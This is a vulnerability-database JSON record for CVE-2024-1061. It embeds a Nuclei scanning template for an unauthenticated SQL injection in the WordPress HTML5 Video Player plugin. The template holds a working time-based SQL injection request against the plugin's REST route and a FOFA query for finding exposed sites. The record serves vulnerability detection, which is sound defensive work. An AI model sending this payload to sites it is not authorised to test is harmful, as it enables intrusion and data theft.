{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-1061/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-1061/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-1061/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-1061/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-1061/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-1061"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-1061"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-1061.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2024-1061\n\ninfo:\n  name: WordPress HTML5 Video Player - SQL Injection\n  author: xxcdd\n  severity: critical\n  description: |\n    WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.\n  remediation: |\n    Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.\n  reference:\n    - https://www.tenable.com/security/research/tra-2024-02\n    - https://wordpress.org/plugins/html5-video-player\n    - https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061\n    - https://github.com/tanjiti/sec_profile\n    - https://github.com/JoshuaMart/JoshuaMart\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2024-1061\n    cwe-id: CWE-89\n    epss-score: 0.11215\n    epss-percentile: 0.95809\n    cpe: cpe:2.3:a:bplugins:html5_video_player:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: bplugins\n    product: html5_video_player\n    framework: wordpress\n    fofa-query: \"\\\"wordpress\\\" && body=\\\"html5-video-player\\\"\"\n  tags: time-based-sqli,cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 20s\n        GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=6'\n          - 'contains(header, \"application/json\")'\n          - 'contains_all(body, \"created_at\", \"video_id\")'\n        condition: and\n# digest: 4b0a0048304602210086a6f06e87794069bd14814e5d1f496f2389cdf036f576b0cf72fe31ffdda586022100c5ed0ca7583075a69239c1761dea524a0a014a538fd78a4a45e81f90cf435751:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-1061"
}